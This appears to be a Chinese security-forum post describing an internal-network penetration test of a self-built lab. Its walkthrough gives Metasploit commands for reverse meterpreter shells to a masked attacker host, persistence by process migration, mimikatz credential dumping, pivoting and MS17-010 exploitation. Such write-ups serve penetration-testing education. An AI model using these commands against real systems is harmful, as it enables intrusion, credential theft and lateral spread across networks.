安全矩阵

 找回密码
 立即注册
搜索
查看: 5298|回复: 0

实战讲解内网渗透思路

[复制链接]

8

主题

8

帖子

62

积分

注册会员

Rank: 2

积分
62
发表于 2020-1-2 22:06:09 | 显示全部楼层 |阅读模式
简介本次测试为实战测试,测试环境是自己搭建的虚拟机中的一部分,敏感信息内容已做打码处理,仅供讨论学习。

获得shell
Getshell的过程没什么好说的,无非简单的后台弱口令到上传然后冰蝎连接getshell。
获得shell后,模拟终端ping 8.8.8.8有返回包,说明该服务器与外网互通。


既然跟外网互通,那么可以尝试直接使用msf的exploit/multi/handler配合冰蝎反弹shell来获得session
  1. use exploit/multi/handler
  2. set payload windows/x64/meterpreter/reverse_tcp
  3. set lhost xxx.xxx.xxx.xxx
  4. set lport 5665
  5. run
复制代码

但是结果很不尽人意,没能够成功获得session。
在使用冰蝎模拟终端收集信息过程中,发现本地有powershell进程。


再次打开msf,本次尝试使用web_delivery配合终端执行powershell指令来获得session。
  1. User exploit/multi/script/web_delivery
  2. Set targets 2
  3. set payload windows/x64/meterpreter/reverse_https
  4. set lhost xxx.xxx.xxx.xxx
  5. set lport 4332
  6. set srvport
  7. run
复制代码





获得payload,使用冰蝎或者C刀模拟终端直接执行,成功获得session,执行getuid发现权限为system权限,省去了提权过程。



权限维持
  1. 为了获得一个持久稳定的高权限session,我们需要将当前的session进程迁移到一个持久、坚挺又稳定的进程上,防止突然暴毙(咳咳)
复制代码


我们使用ps查看当前进程,然后选中一个看起来比较持久的幸运儿spoolsv.exe(这是一个用来控制打印的进程,我遇到的机器基本都开启了此进程)
注意:选择进程的时候优先选择系统进程,这种比较持久且为system权限

  1. migrate 进程号
  2. getpid
复制代码




内网信息收集

  1. 不管是在什么类型的渗透环境下,信息搜集永远是不可缺少的一环,他决定了你渗透的效率,可以让你在渗透过程中少走很多弯路,毕竟在项目上尤其是红蓝攻防中,最缺的永远是时间
复制代码
接下来,查看IP信息以及arp缓存,查看网段分布情况:




发现该服务器只存在192.168.10.0/24网段的信息
于是继续查看其他信息

  1. Netstat -ano
复制代码


发现服务器开放3389端口:


既然开启了3389端口,我们使用端口转发,登录到服务器看看有没有意外收获。

  1. portfwd add -l 6666 -p 3389 -r 127.0.0.1
复制代码


IP有了,3389开了,现在我们缺少的是用户名密码
直接meterpreter下加载mimikatz


  1. Load mimikatz
  2. Wdigest
复制代码




比较遗憾的是没能获取到明文密码,但是我这边使用cobalt strike加载的mimikatz成功获取到明文密码
emmm总之搞不懂的地方先归为玄学问题




现在,密码也有了,mstsc链接目标3389端口成功此处涉及的敏感信息较多,放弃截图,我尽量用语言表述清楚思路
上传netpass查看rdp缓存,无果,但是发现系统有VNC


查看VNC相关文件发现新的网段信息,但是没有保存的连接信息,不过能获得新的网段信息也是知足了



横向
至此,信息收集部分其实也就差不多,接下来我们开始尝试横向移动

根据之前发现的网段信息以及服务器本机的路由信息,我们手动添加路由

  1. Run autoroute -s 192.168.10.0/24
  2. Run autoroute -s 172.16.0.0/24
  3. ……
复制代码
其他网段同理,添加路由之后bg退回到控制台
先使用auxiliary/scanner/smb/smb_version模块扫描一下各网段的smb服务开启情况

  1. Use auxiliary/scanner/smb/smb_version
  2. set rhosts 192.168.10.0/24
  3. set threads 10
  4. run
复制代码


可以看到,活着的机器还挺多。


然后,使用auxiliary/scanner/smb/psexec_loggedin_users模块配合已获得的两组账户密码进行横向
  1. Use auxiliary/scanner/smb/psexec_loggedin_users
  2. Set rhosts 192.168.10.0/24
  3. Set smbuser username
  4. Set smbpass password
  5. Set threads 5
  6. run
复制代码

尴尬,横向失败,居然没有用同账户密码

既然横向失败,可以考虑最简单的,但也是最实用的大杀器,ms17-010
先使用scanner模块扫描一下哪些机器可能存在ms17-010的漏洞

  1. Use auxiliary/scanner/smb/smb_ms17_010
  2. Set rhosts 192.168.10.0/24
  3. Set thread 20
  4. Run
复制代码

由于打ms17-010的流量比较大,为了防止死掉,我根据扫描出来的结果,针对性的选择一台感觉比较容易搞的目标,单独打。
此处试了很多机器,好多都打了补丁,不过也有漏网之鱼,此处单独拿一台示例:
Use auxiliary/admin/smb/ms17_010_command
set rhost 192.168.10.18
set command whoami

run



成功执行,是system权限,同理command换成弹shell的命令,便可以获得该机器的权限。



获得新机器的权限之后,便可以围绕新机器进行新一轮的信息搜集,然后不断横向,进一步扩大内网战果,以下,就不在多做测试。
另外对于ms17-010,如果说打2003的机器,建议使用auxiliary/admin/smb/ms17_010_command模块进行执行命令获得session;其他的可以直接使用exploit/windows/smb/ms17_010_eternalblue或者exploit/windows/smb/ms17_010_psexec来直接获得session。


写在最后
咕某人提醒您:道路千万条,安全第一条;渗透不规范,亲人两行泪。
以上渗透测试过程纯属本人杜撰,渗透是不可能渗透的,这辈子都不可能渗透的。
最后,对于过程中有任何疑问都可以评论留言,我会的会一一回复,不会的也能让路过的表哥给康康,说不定表哥就给解决了呢,嘿嘿(发出了白嫖的笑声)。


本文来自先知社区:https://xz.aliyun.com/


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:35 , Processed in 0.015612 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表